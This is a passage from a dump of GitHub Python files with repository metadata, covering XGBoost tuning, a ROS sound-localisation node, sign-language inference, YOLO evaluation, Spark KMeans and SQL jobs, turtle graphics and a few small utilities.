int(cf.get('xg_conf', 'eval'))\n cv = int(cf.get('xg_conf','cv'))\n\n t_num_round = int(cf.get('xg_tune','num_round'))\n t_max_depth = [int(i) for i in cf.get('xg_tune','max_depth').split(',')]\n t_subsample = [float(i) for i in cf.get('xg_tune','subsample').split(',')]\n t_min_child_weight = [float(i) for i in cf.get('xg_tune','min_child_weight').split(',')]\n t_colsample_bytree = [float(i) for i in cf.get('xg_tune','colsample_bytree').split(',')]\n\n t_param = {'num_round':t_num_round,'max_depth':t_max_depth,'subsample':t_subsample,\n 'min_child_weight':t_min_child_weight,'colsample_bytree':t_colsample_bytree}\n\n params = {'booster': booster, 'objective': objective, 'silent': silent, 'eta': eta, 'gamma': gamma,\n 'max_delta_step':max_delta_step,'lambda':p_lambda,'alpha':alpha,'sketch_eps':sketch_eps,\n 'refresh_leaf':refresh_leaf,'base_score':base_score,'max_depth':max_depth,'subsample':subsample,\n 'min_child_weight':min_child_weight,'colsample_bytree':colsample_bytree,\n # 'eval_metric':eval_metric,\n 'seed':seed,'nthread': nthread}\n\n others = {'num_round':t_num_round,'cv':cv,'ascend':ascend,'eval_metric':eval_metric}\n data = cf.get('xg_conf', 'data')\n\n if int(cf.get('xg_conf','xgmat'))==0: # if it is not a xgmat file, than convert it\n try:\n label = cf.get('xg_conf', 'label')\n save2xgdata(data, label)\n data += '.libsvm'\n except:\n pass\n else:\n data = cf.get('xg_conf', 'xgdata')\n return data, params,t_param,others\n\ndef get_negative_positive_ratio(y):\n labels_np = np.array(y)\n neg_num = np.sum(labels_np==0)\n pos_num = np.sum(labels_np==1)\n return neg_num/pos_num\n\ndef tune_num_boost_round(params,dtrain,num_boost_round,watchlist,eval_metric,feval=None,ascend=True):\n\n evals_result = {}\n if(feval==None):\n params['eval_metric'] = eval_metric\n xgb.train(params=params,dtrain=dtrain,num_boost_round=num_boost_round,evals=watchlist,feval=feval,evals_result=evals_result)\n evals_result = evals_result['eval'][eval_metric]\n if(ascend==True):\n loc = max(enumerate(evals_result), key=lambda x: x[1])[0]\n else:\n loc = min(enumerate(evals_result), key=lambda x: x[1])[0]\n loc += 1\n print('**** num_boost_round : %s : %s'%(loc,evals_result[loc-1]))\n return loc\n\ndef custom_eval_metirc_precison(preds,dtrain):\n labels = dtrain.get_label()\n flag1 = np.prod(preds<=1.0)\n flag2 = np.prod(preds>=0.0)\n flag = flag1*flag2\n assert flag == 1,\"预测出来的值不是概率\"\n preds = preds>=0.5\n preds = preds.astype(int)\n precison = precision_score(labels,preds)\n return 'precision',precison\n\ndef custom_eval_metirc_recall(preds,dtrain):\n labels = dtrain.get_label()\n flag1 = np.prod(preds<=1.0)\n flag2 = np.prod(preds>=0.0)\n flag = flag1*flag2\n assert flag == 1,\"预测出来的值不是概率\"\n preds = preds>=0.5\n preds = preds.astype(int)\n recall = recall_score(labels,preds)\n return 'recall',recall\n\ndef set_custom_eval_metirc(eval_metirc):\n\n custom_fs = dict(precision=custom_eval_metirc_precison,\n recall=custom_eval_metirc_recall)\n for k,v in custom_fs.items():\n if(eval_metirc==k):\n return v\n return None\nif __name__ == '__main__':\n arg = arg_parser()\n xgdata,params,params_t,params_other = conf_parser(arg.conf)\n\n x, y = get_csr_labels(xgdata)\n x_train, x_val, y_train, y_val = train_test_split(x, y, test_size=0.3, random_state=42)\n dtrain = xgb.DMatrix(x_train, label=y_train)\n dval = xgb.DMatrix(x_val, y_val)\n dtrain_whole = xgb.DMatrix(xgdata)\n watchlist = [(dtrain, 'train'), (dval, 'eval')]\n watchlist_whole = [(dtrain_whole, 'eval')]\n\n scale_pos_weight = get_negative_positive_ratio(y)\n params['scale_pos_weight'] = scale_pos_weight\n custom_feval = set_custom_eval_metirc(params_other['eval_metric'])\n # tune the parameter num_round\n num_round = tune_num_boost_round(params,dtrain,params_other['num_round'],watchlist,eval_metric=params_other['eval_metric'],feval=custom_feval,ascend=params_other['ascend'])\n\n params_t = [dict(max_depth=params_t['max_depth']),\n dict(subsample=params_t['subsample']),\n dict(min_child_weight=params_t['min_child_weight']),\n dict(colsample_bytree=params_t['colsample_bytree'])]\n for param_t in params_t:\n k = param_t.keys()[0]\n values = param_t[k]\n if(k=='num_round'):\n continue\n # pprint.pprint(params)\n print('========== ',k,' ========== ',values)\n result = []\n if(len(values) == 1):\n params[k] = values[0]\n continue\n for v in values:\n print('**** for : %s ****\\n'%(str(v)))\n params[k] = v\n if (custom_feval == None):\n params['eval_metric'] = params_other['eval_metric']\n result_df = xgb.cv(params=params,\n dtrain=dtrain_whole,\n num_boost_round=num_round,\n nfold=params_other['cv'],\n # metrics=params_other['eval_metric'],\n feval=custom_feval,\n verbose_eval=False,\n show_stdv=False,\n shuffle=True)\n result_df = result_df[['test-'+params_other['eval_metric']+'-mean']]\n # print(result_df)\n assert result_df.columns[0]=='test-'+params_other['eval_metric']+'-mean','choose the correct column\\n'\n result_np = result_df.as_matrix()\n result.append(float(result_np[-1][0]))\n print(zip(values,result))\n if(params_other['ascend'] == 1):\n loc = max(enumerate(result),key=lambda x:x[1])[0]\n else:\n loc = min(enumerate(result),key=lambda x:x[1])[0]\n params[k] = values[loc]\n print('%s : %s\\n'%(k,params[k]))\n num_round = tune_num_boost_round(params,dtrain_whole,params_other['num_round'],watchlist_whole,eval_metric=params_other['eval_metric'],feval=custom_feval,ascend=params_other['ascend'])\n model = xgb.train(params,dtrain_whole,num_round,watchlist_whole,feval=custom_feval)\n pprint.pprint(params)\n time_str = time.strftime(\"%Y_%m_%d_%H_%M_%S\", time.localtime())\n model.save_model(arg.output + '/' + time_str + '.xgmodel')\n print('saved : %s' % (arg.output + '/' + time_str + '.xgmodel'))\n","repo_name":"AlexYoung757/trend_ml_toolkit_xgboost","sub_path":"xg_train_cv.py","file_name":"xg_train_cv.py","file_ext":"py","file_size_in_byte":8307,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"96"} +{"seq_id":"74436606075","text":"#!/usr/bin/env python\n# coding:utf-8\n'''sydw ROS Node'''\n# license removed for brevity\n# 生源定位,灵犀灵犀唤醒词\nimport rospy\nimport os\nimport sys\nfrom std_msgs.msg import String\nfrom geometry_msgs.msg import Twist\nfrom std_msgs.msg import Float32\nfrom std_msgs.msg import Int16\nimport math\nimport time\nimport thread\n\nimport logging\nlogging.basicConfig()\n\ncnt = 0\nwakeupcount = 0\nclass sydw:\n def __init__(self, script_path):\n rospy.init_node(\"sydw\")\n self.pub=rospy.Publisher('/cmd_vel',Twist,queue_size=10)\n self.pub2 = rospy.Publisher('/xfwakeup',String,queue_size=10)\n self.sub=rospy.Subscriber('/Shengyuan',Int16,self.abs)\n self.angle = 0\n self.lock = False\n self.location = 0\n self.start = True\n def abs(self,data):\n global wakeupcount\n if(wakeupcount < 5): #第一阶段\n msg1 = String()\n msg1.data = \"ok\"\n rospy.loginfo(\"speak out\")\n self.pub2.publish(msg1)\n wakeupcount += 1\n else: #第二阶段\n thread.start_new_thread(self.adjust,(data,))\n print(wakeupcount)\n #rospy.loginfo(float(data.data))\n def adjust(self,data):\n #rospy.loginfo(\"get\")\n #rospy.loginfo(data.data)\n vel_attitude = -1.0\n try:\n get_angle = float(data.data)\n except:\n return \n if(get_angle > 180):\n get_angle = 360 - get_angle\n vel_attitude = 1.0\n if(get_angle == self.location):\n return \n self.location = get_angle\n #rospy.loginfo(self.start)\n if(get_angle>0):\n fabs = get_angle\n else:\n fabs = -get_angle\n rate = rospy.Rate(3)\n if(self.lock == True):\n self.lock = False\n else:\n self.lock = True\n sublock = self.lock\n global cnt\n cnt += 1\n jiasu = self.start\n self.start = False\n flag = False\n while(self.lock == sublock): #angle\n msg = Twist()\n if(get_angle > self.angle):\n value = 12\n elif(get_angle < self.angle):\n value = -12\n else:\n value = 0\n #msg.angular.z=float(value)\n msg.angular.z=float(value)*(vel_attitude)\n if(jiasu == True): #kaolvjiasu\n if(self.angle < 20):\n value = 2.5*math.sqrt(self.angle)+1\n self.angle += value\n self.pub.publish(msg)\n rate.sleep()\n rospy.loginfo(self.angle)\n if(math.fabs((self.angle - fabs))<=value):\n flag = True\n msg1 = String()\n msg1.data = \"ok\"\n rospy.loginfo(\"speak out\")\n self.pub2.publish(msg1)\n break\n self.angle = 0\n self.start = flag\n \nif __name__==\"__main__\":\n try:\n sydw(sys.path[0])\n rospy.spin()\n except rospy.ROSInterruptException:\n rospy.loginfo(\"sydw class has not been constructed. Something is error.\")\n","repo_name":"Benxiaogu/catkin_ws","sub_path":"riddle2019/src/sydw_pub.py","file_name":"sydw_pub.py","file_ext":"py","file_size_in_byte":3168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"43934551335","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 26 18:47:21 2020\n\n@author: gnumi34\n\"\"\"\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math\nimport sys\n\ntry:\n file_name = sys.argv[1]\nexcept IndexError:\n raise SystemExit(f\"usage: {sys.argv[0]} csv_file\")\n\ndata = pd.read_csv(file_name)\n\n# Number of samplepoints\nN = len(data)\nTime = data['Time (s)']\nT = Time[N-1]\nt_plt = np.linspace(0, T, N, endpoint=False)\n\nplt.title(\"Flow Rate Measurement\")\nplt.plot(t_plt, data['Flow Rate (uL/min)'], label='Measured Flow')\nplt.xlabel('Time [sec]')\nplt.ylabel('Flow Rate [uL/min]')\nplt.grid(True)\nplt.legend()\nplt.show()\n","repo_name":"gnumi34/OL-Peristaltic-Pump","sub_path":"plot/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"40011030363","text":"f = open(\"17.txt\")\ns = [int(x.strip()) for x in f]\nn = 0\nmaxs = -1\nl = len(s)\n# print(*range(l))\n# alt + shift + l - автовыравнивание\nfor i in range(l):\n for j in range(i + 1, l):\n if (s[i] - s[j]) % 60 == 0 and (s[i] % 15 == 0 or s[j] % 15 == 0):\n n += 1\n maxs = max(maxs, abs(s[i] - s[j]))\n\nprint(n, maxs)\n","repo_name":"ItZoopark/ege_preparation","sub_path":"17/решу егэ/37370.py","file_name":"37370.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"22933826197","text":"\"\"\"\nGiven a binary tree, find the lowest common ancestor\n(LCA) of two given nodes in the tree.\n\nAccording to the definition of LCA on Wikipedia:\n “The lowest common ancestor is defined between two nodes\n v and w as the lowest node in T that has both v and w as\n descendants\n (where we allow a node to be a descendant of itself).”\n\n _______3______\n / \\\n ___5__ ___1__\n / \\ / \\\n 6 _2 0 8\n / \\\n 7 4\nFor example, the lowest common ancestor (LCA) of nodes 5 and 1 is 3.\nAnother example is LCA of nodes 5 and 4 is 5,\nsince a node can be a descendant of itself according to the LCA definition.\n\"\"\"\n\n\ndef lca(root, p, q):\n \"\"\"\n :type root: TreeNode\n :type p: TreeNode\n :type q: TreeNode\n :rtype: TreeNode\n \"\"\"\n if root is None or root is p or root is q:\n return root\n left = lca(root.left, p, q)\n right = lca(root.right, p, q)\n if left is not None and right is not None:\n return root\n return left if left else right\n","repo_name":"keon/algorithms","sub_path":"algorithms/tree/lowest_common_ancestor.py","file_name":"lowest_common_ancestor.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":23106,"dataset":"github-code","pt":"96"} +{"seq_id":"70273138876","text":"import os\nfrom collections import deque\n\nimport cv2\nimport numpy as np\nimport tensorflow as tf\nimport mediapipe as mp\nfrom mediapipe.tasks import python\nfrom mediapipe.tasks.python import vision\n\nos.environ['CUDA_VISIBLE_DEVICES'] = '-' # Edge에서 이용하는 것이 목표이므로 GPU를 이용하지 않음\n\nquestion1 = ['허벅지', '무릎', '발목', '발가락', '코', '귀', '손목', '얼굴', '어깨', '팔꿈치', '손', '가슴', '등', '배', '갈비뼈', '골반', '관절', '근육',\n '기도', '뇌', '두개골', '맹장', '목구멍', '성대', '식도', '심장', '엉덩이', '이마', '입속', '입술', '전립선', '질', '척추', '치아', '턱',\n '피부', '혀', '눈', '다리', '머리']\nquestion2 = ['오른쪽', '앞', '왼쪽', '사이', '뒤', '가운데', '경계', '바깥', '반대', '속', '안팎', '이쪽', '전부']\nquestion3 = ['토하다', '가렵다', '괜찮다', '괴롭다', '띵하다', '목마르다', '배탈', '아프다', '약하다', '어지럽다', '조마조마하다', '차다', '힘겹다']\nquestion4 = ['아니오', '예']\nquestions = [None, question1, question2, question3, question4]\nlabel_numbers = [None, 40, 13, 13, 2]\nnull_hand = [0 for _ in range(126)]\n\nbase_options = python.BaseOptions(model_asset_path='hand_landmarker.task')\noptions = vision.HandLandmarkerOptions(base_options=base_options, num_hands=2)\ndetector = vision.HandLandmarker.create_from_options(options)\nmp_holistic = mp.solutions.holistic\nholistic = mp_holistic.Holistic(min_detection_confidence=0.5, min_tracking_confidence=0.5)\n\n\ndef infer(q_num, video):\n def classify(q_num, video):\n model = tf.keras.models.load_model('models/q' + str(q_num) + '.h5')\n video = np.array(video)\n video = video.reshape(1, 30, 1662)\n result = model.predict(video)\n return np.argmax(result)\n\n def extract_keypoints(results):\n pose = np.array([[res.x, res.y, res.z, res.visibility] for res in\n results.pose_landmarks.landmark]).flatten() if results.pose_landmarks else np.zeros(33 * 4)\n face = np.array([[res.x, res.y, res.z] for res in\n results.face_landmarks.landmark]).flatten() if results.face_landmarks else np.zeros(\n 468 * 3)\n lh = np.array([[res.x, res.y, res.z] for res in\n results.left_hand_landmarks.landmark]).flatten() if results.left_hand_landmarks else np.zeros(\n 21 * 3)\n rh = np.array([[res.x, res.y, res.z] for res in\n results.right_hand_landmarks.landmark]).flatten() if results.right_hand_landmarks else np.zeros(\n 21 * 3)\n return np.concatenate([pose, face, lh, rh])\n\n def mediapipe_detection(image, model):\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n image.flags.writeable = False\n results = model.process(image)\n image.flags.writeable = False\n image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\n return image, results\n\n video = cv2.VideoCapture(video)\n label_counts = [0 for _ in range(label_numbers[q_num])]\n sequences = deque()\n hand_exits = False\n while True:\n ret, image = video.read()\n if not ret:\n break\n image, results = mediapipe_detection(image, holistic)\n keypoints = np.array(extract_keypoints(results), dtype=\"float64\")\n if hand_exits:\n sequences.append(keypoints)\n elif np.array_equal(keypoints[1536:], null_hand):\n continue\n else:\n hand_exits = True\n sequences.append(keypoints)\n\n if len(sequences) == 30:\n temp = classify(q_num, sequences)\n label_counts[temp] += 1\n sequences.popleft()\n\n elif len(sequences) < 30:\n continue\n\n return questions[q_num][np.argmax(label_counts)]","repo_name":"subin9/Korean-Sign-Language-Recognintion-Application","sub_path":"infer.py","file_name":"infer.py","file_ext":"py","file_size_in_byte":3883,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"3704756625","text":"import os\nimport torch\nimport time\nfrom utils import make_pred_bbox, voc_labels_array, make_pred_bbox_for_COCO\nfrom voc_eval import voc_eval\nimport matplotlib.pyplot as plt\nfrom matplotlib.patches import Rectangle\nimport argparse\n# --- for test\nfrom dataset.voc_dataset import VOC_Dataset\nfrom loss import Yolo_Loss\nfrom model import YOLO_VGG_16\n\n\ndef test(epoch, device, vis, test_loader, model, criterion, opts, eval=False):\n\n # ---------- load ----------\n print('Validation of epoch [{}]'.format(epoch))\n model.eval()\n check_point = torch.load(os.path.join(opts.save_path, opts.save_file_name) + '.{}.pth.tar'.format(epoch),\n map_location=device)\n state_dict = check_point['model_state_dict']\n model.load_state_dict(state_dict, strict=True)\n\n visualization = False\n\n det_img_name = list()\n det_additional = list()\n det_boxes = list()\n det_labels = list()\n det_scores = list()\n\n tic = time.time()\n with torch.no_grad():\n\n for idx, datas in enumerate(test_loader):\n '''\n + VOC dataset\n for VOC datasets, datas including follows:\n (images, boxes, labels, difficulties, img_names, additional_info)\n '''\n images = datas[0]\n boxes = datas[1]\n labels = datas[2]\n difficulties = datas[3]\n img_names = datas[4]\n additional_info = datas[5]\n\n # (images, boxes, labels, difficulties, img_names, additional_info)\n\n # ---------- cuda ----------\n images = images.to(device)\n boxes = [b.to(device) for b in boxes]\n labels = [l.to(device) for l in labels]\n\n # ---------- loss ----------\n preds = model(images)\n preds = preds.permute(0, 2, 3, 1) # B, 13, 13, 125\n\n loss, _ = criterion(preds, boxes, labels)\n # ---------- eval ----------\n if eval:\n bbox, cls, scores = make_pred_bbox(preds=preds, conf_threshold=opts.conf_thres)\n\n # coco\n det_img_name.append(img_names[0])\n det_additional.append(additional_info[0])\n\n det_boxes.append(bbox)\n det_labels.append(cls)\n det_scores.append(scores)\n # print(bbox)\n\n if visualization:\n # 0. permute\n images = images.cpu()\n images = images.squeeze(0).permute(1, 2, 0) # B, C, H, W --> H, W, C\n\n # 1. un normalization\n images *= torch.Tensor([0.229, 0.224, 0.225])\n images += torch.Tensor([0.485, 0.456, 0.406])\n\n # 2. RGB to BGR\n image_np = images.numpy()\n\n # 3. box scaling\n bbox *= 416\n\n plt.figure('result')\n plt.imshow(image_np)\n\n for i in range(len(bbox)):\n print(cls[i])\n plt.text(x=bbox[i][0],\n y=bbox[i][1],\n s=voc_labels_array[int(cls[i].item())] + str(scores[i].item()),\n fontsize=10,\n bbox=dict(facecolor='red', alpha=0.5))\n\n plt.gca().add_patch(Rectangle(xy=(bbox[i][0], bbox[i][1]),\n width=bbox[i][2] - bbox[i][0],\n height=bbox[i][3] - bbox[i][1],\n linewidth=1, edgecolor='r', facecolor='none'))\n\n plt.show()\n\n toc = time.time() - tic\n # ---------- print ----------\n # for each steps\n if idx % 1000 == 0:\n print('Epoch: [{0}]\\t'\n 'Step: [{1}/{2}]\\t'\n 'Time : {time:.4f}\\t'\n .format(epoch,\n idx, len(test_loader),\n time=toc))\n annotation_path = os.path.join(opts.data_path, \"TEST\\VOC2007\\Annotations\")\n mAP = voc_eval(annotation_path, det_img_name, det_additional, det_boxes, det_scores, det_labels)\n\n if vis is not None:\n # loss plot\n vis.line(X=torch.ones((1, 2)).cpu() * epoch, # step\n Y=torch.Tensor([loss, mAP]).unsqueeze(0).cpu(),\n win='test_loss',\n update='append',\n opts=dict(xlabel='step',\n ylabel='test',\n title='test loss',\n legend=['test Loss', 'mAP']))\n\n\nif __name__ == \"__main__\":\n\n # 1. argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('--test_epoch', type=int, default=149)\n parser.add_argument('--data_path', type=str, default=\"D:\\Data\\VOC_ROOT\")\n parser.add_argument('--save_path', type=str, default='./saves')\n parser.add_argument('--save_file_name', type=str, default='yolo_v2_vgg_16')\n parser.add_argument('--conf_thres', type=float, default=0.01)\n\n from config import device\n test_opts = parser.parse_args()\n print(test_opts)\n\n epoch = test_opts.test_epoch\n\n # 2. device\n device = device\n\n # 3. visdom\n vis = None\n\n # 4. data set\n test_set = VOC_Dataset(root=test_opts.data_path, split='TEST')\n test_loader = torch.utils.data.DataLoader(test_set,\n batch_size=1,\n collate_fn=test_set.collate_fn,\n shuffle=False)\n # 6. network\n model = YOLO_VGG_16().to(device)\n\n # 7. loss\n criterion = Yolo_Loss(num_classes=20)\n\n test(epoch=epoch,\n device=device,\n vis=vis,\n test_loader=test_loader,\n model=model,\n criterion=criterion,\n opts=test_opts,\n eval=True)\n\n\n\n\n\n\n\n","repo_name":"csm-kr/yolo_v2_vgg16_pytorch","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":6062,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"96"} +{"seq_id":"12463108847","text":"import os\nimport sys\nimport unittest\n\nfrom pathlib import Path\nsys.path.append(os.fspath(Path(__file__).resolve().parents[1]))\nfrom init_paths import init_test_paths\ninit_test_paths(True)\n\nfrom testbinding import TestView\nfrom PySide6.QtCore import QAbstractListModel, QObject, QModelIndex\n\n'''Tests model/view relationship.'''\n\nobject_name = 'test object'\n\n\nclass MyObject(QObject):\n pass\n\n\nclass ListModelKeepsReference(QAbstractListModel):\n def __init__(self, parent=None):\n QAbstractListModel.__init__(self, parent)\n self.obj = MyObject()\n self.obj.setObjectName(object_name)\n\n def rowCount(self, parent=QModelIndex()):\n return 1\n\n def data(self, index, role):\n return self.obj\n\n\nclass ListModelDoesntKeepsReference(QAbstractListModel):\n def rowCount(self, parent=QModelIndex()):\n return 1\n\n def data(self, index, role):\n obj = MyObject()\n obj.setObjectName(object_name)\n return obj\n\n\nclass ListModelThatReturnsString(QAbstractListModel):\n def rowCount(self, parent=QModelIndex()):\n return 1\n\n def data(self, index, role):\n self.obj = 'string'\n return self.obj\n\n\nclass ModelViewTest(unittest.TestCase):\n\n def testListModelDoesntKeepsReference(self):\n model = ListModelDoesntKeepsReference()\n view = TestView(model)\n obj = view.getData()\n self.assertEqual(type(obj), MyObject)\n self.assertEqual(obj.objectName(), object_name)\n obj.metaObject()\n\n def testListModelKeepsReference(self):\n model = ListModelKeepsReference()\n view = TestView(model)\n obj = view.getData()\n self.assertEqual(type(obj), MyObject)\n self.assertEqual(obj.objectName(), object_name)\n\n def testListModelThatReturnsString(self):\n model = ListModelThatReturnsString()\n view = TestView(model)\n obj = view.getData()\n self.assertEqual(type(obj), str)\n self.assertEqual(obj, 'string')\n\n\nif __name__ == '__main__':\n unittest.main()\n\n","repo_name":"qtproject/pyside-pyside-setup","sub_path":"sources/pyside6/tests/pysidetest/modelview_test.py","file_name":"modelview_test.py","file_ext":"py","file_size_in_byte":2031,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"96"} +{"seq_id":"72821927996","text":"#!/usr/bin/env python\n# coding: utf-8\n\n'''\nTurtle starter code\nATLS 1300\nAuthor: Dr. Z\nAuthor: YOUR NAME\nMay 29, 2020\n'''\n\nfrom turtle import * #import the library of commands that you'd like to use\n\ncolormode(255)\n\n# Create a panel to draw on. \npanel = Screen()\nw = 750 # width of panel\nh = 750 # height of panel\npanel.setup(width=w, height=h) #600 x 600 is a decent size to work on. \n#You can experiment by making it the size of your screen or super tiny!\n\n# Create a colorful background and add Bezos image to it\nimage = \"Bezos.gif\"\npanel.bgcolor(\"lightblue\")\npanel.bgpic(image)\n\n# sqaure above left shoulder \nup()\ngoto(-250,-14)\ndown()\nspeed(20)\npensize(4)\npencolor(\"black\")\nfillcolor(230, 10, 100)\nbegin_fill()\nfor b in range(4):\n forward(50)\n left(90)\nend_fill()\n\n# star and circle at end of star\nup()\ngoto(-205, 110)\ndown()\n\npensize(5)\npencolor(\"purple\")\nfor i in range(20):\n forward(i * 10)\n right(144)\npencolor('orange')\ncircle(20)\n\n# sunglasses bridge\npencolor('black')\nup()\ngoto(0, 120)\nleft(11)\ndown()\nforward(27)\nup()\n# sunglasses ear piece \ngoto(-34, 113)\nright(195)\ndown()\nforward(54)\nup()\n# sunglasses lenses\ngoto(45, 137)\ndown()\nfillcolor('black')\nbegin_fill()\ncircle(18)\nend_fill()\nup()\ngoto(-15, 136)\ndown()\nfillcolor('black')\nbegin_fill()\ncircle(18)\nend_fill()\n\n# sun\nup()\ngoto(288, 148)\ncolor('yellow')\ndown()\nbegin_fill()\nwhile True:\n forward(200)\n left(170)\n if abs(pos()) < 1:\n break\nend_fill()\ndone()\n\n#sorry it's kind of random, I wanted to do something with a dollar sign but couldn't figure that out so I thought a sun and sunglasses were fun with some other cool designs! \n","repo_name":"ATLS1300/pc02-graffiti-11-emerson-zamensky","sub_path":"PC02_Graffiti_Zamensky.py","file_name":"PC02_Graffiti_Zamensky.py","file_ext":"py","file_size_in_byte":1630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"8796197689","text":"from numpy import array\nfrom math import sqrt\nfrom pyspark.mllib.clustering import KMeans, KMeansModel\nimport time\nfrom pyspark import SparkContext, SparkConf\nfrom pyspark.sql import SparkSession\n\nclass KMeansClustering:\n def __init__(self) -> None:\n pass\n\n def get_spark_context_all_core(self):\n spark = SparkSession.builder \\\n .master(\"local[*]\") \\\n .appName(\"k_means_streaming_example\") \\\n .getOrCreate()\n return spark.sparkContext\n\n def create_clusters(self, input_data):\n def test(l):\n array([float(x) for x in l.split(' ')]) \n\n def rmse(pt):\n c = clusters.centers[clusters.predict(pt)]\n return sqrt(sum([y**2 for y in (c - pt)]))\n\n input_data = input_data.map(lambda l: array([float(x) for x in l.split(' ')]))\n clusters = KMeans.train(input_data, 2, initializationMode=\"random\", maxIterations=8)\n # clusters = KMeans.train(input_data, 5, initializationMode=\"random\", maxIterations=13)\n RMSEE = input_data.map(lambda pt: rmse(pt))\n RMSEE = RMSEE.reduce(lambda m, n: m + n)\n print(\"Root Mean Squared Error = \" + str(RMSEE))\n\nif __name__ == \"__main__\":\n kmeans = KMeansClustering()\n sc = kmeans.get_spark_context_all_core()\n start_time = time.time()\n input_data = sc.textFile(\"input_kmeans_small2_dataset.txt\")\n kmeans.create_clusters(input_data)\n end_time = time.time()\n print(\"\\n\\n ************************************\")\n print(\"\\n\\n Total execution time for large dataset: \", end_time - start_time)\n print(\"\\n\\n ************************************\")\n sc.stop()","repo_name":"hedaanirudh/sparkTestApplication","sub_path":"kmeans_clustering.py","file_name":"kmeans_clustering.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"1432223101","text":"from pyspark.sql import SparkSession\n\ndef word_count(string):\n\tif (string):\n\t\treturn len(string.split(\" \"))\n\treturn 0\n\nspark = SparkSession.builder.appName('query4_sql').getOrCreate()\n\nspark.udf.register(\"word_count\", word_count)\n\nmovies = spark.read.format('csv') \\\n\t.options(header='false', inferSchema='true') \\\n\t.load('hdfs://master:9000/movies/data/movies.csv')\n\nmovies.registerTempTable('movies')\n\ncleaned_movies = \\\n\t\"SELECT _c0 AS Movie, _c2 AS Summary, YEAR(_c3) AS Date \" + \\\n\t\"FROM movies \" + \\\n\t\"WHERE YEAR(_c3) >= 2000\"\n\ntemp1 = spark.sql(cleaned_movies)\ntemp1.registerTempTable('cleaned_movies')\n\ngenres = spark.read.format('csv') \\\n\t.options(header='false', inferSchema='true') \\\n\t.load('hdfs://master:9000/movies/data/movie_genres.csv')\n\ngenres.registerTempTable('genres')\n\ncleaned_genres = \\\n\t\"SELECT _c0 as Movie, _c1 as Genre \" + \\\n\t\"FROM genres \" + \\\n\t\"WHERE _c1 == 'Drama'\"\n\ntemp3 = spark.sql(cleaned_genres)\ntemp3.registerTempTable('cleaned_genres')\n\nmovies_genres = \\\n\t\"SELECT word_count(M.Summary) AS Word_Count, M.Date AS Date \" + \\\n\t\"FROM cleaned_movies AS M, cleaned_genres AS G \" + \\\n\t\"WHERE M.Movie == G.Movie\"\n\ntemp4 = spark.sql(movies_genres)\ntemp4.registerTempTable('movies_genres')\n\ngrouped_mg = \\\n\t\"SELECT AVG(Word_Count) AS Word_Count, Date \" + \\\n\t\"FROM movies_genres \" + \\\n\t\"GROUP BY Date\"\n\ntemp5 = spark.sql(grouped_mg)\ntemp5.registerTempTable('grouped_mg')\n\nsqlResult = \\\n\t\"SELECT \" + \\\n\t\t\"(CASE WHEN Date < 2005 THEN '2000-2004' \" + \\\n\t\t\"WHEN Date Between 2005 AND 2009 THEN '2005-2009' \" + \\\n\t\t\"WHEN Date BETWEEN 2010 AND 2014 THEN '2010-2014' \" + \\\n\t\t\"WHEN Date > 2014 THEN '2015-2019' END) AS Date_Group, \" + \\\n\t\"AVG(Word_Count) AS Average_WC \" + \\\n\t\"FROM grouped_mg \" + \\\n\t\"GROUP BY Date_Group ORDER BY Date_Group\"\n\nres = spark.sql(sqlResult).coalesce(1).write.json('hdfs://master:9000/movies/output/query4_sql.out')\n","repo_name":"sonqo/ntua-lambda","sub_path":"7-advanced-database-systems/SQL/SummaryWordCount.py","file_name":"SummaryWordCount.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"7615898360","text":"from net import Net\nfrom parameters import Parameters\nimport numpy as np\nimport gzip\nimport pickle\nimport argparse\n\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\n\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib import cm\nfrom matplotlib.ticker import LinearLocator, FormatStrFormatter\n\nfrom interval_bisection import *\nfrom queue import Queue\nfrom diffae import DiffAE\n\nmarker_size = mpl.rcParams['lines.markersize'] ** 2\n\nparser = argparse.ArgumentParser()\nparser.add_argument('file_name', metavar='YYYYMMDD_HHMMSS', type=str, nargs='+',\n help='file name of the pickled parameters object')\n\nargs = parser.parse_args()\n\nfile_name = args.file_name[0]\nf = gzip.open(f'./data/quadratic/{file_name}', 'rb')\nparams = pickle.load(f)\nf.close()\n\nparameters = (params.weights, params.biases)\nnet = Net(params.layers, parameters=parameters)\nprint(params.layers)\n\n# initialize the data\nif isinstance(params.training_data, list):\n\n n = len(params.training_data)\n\n data = np.zeros((2, n))\n\n for i in range(len(params.training_data)):\n\n point = params.training_data[i]\n\n data[:, i] = point[0]\n\nelse:\n\n n = 100\n\n x = np.arange(0.1, 0.9, 0.8/n)\n y = 1 * (x - x**2)\n\n data = np.stack([x, y])\n\n# compute output manifold\noutput = np.zeros((2, n))\n\nfor i in range(n):\n\n output[:, i] = net.feedforward( data[:, i] )\n\nxo = output[0, :]\nyo = output[1, :]\n\n# compute vector field\nxi = np.arange(0, 1, 2/n)\nyi = np.arange(0, 0.5, 2/n)\n\nm = 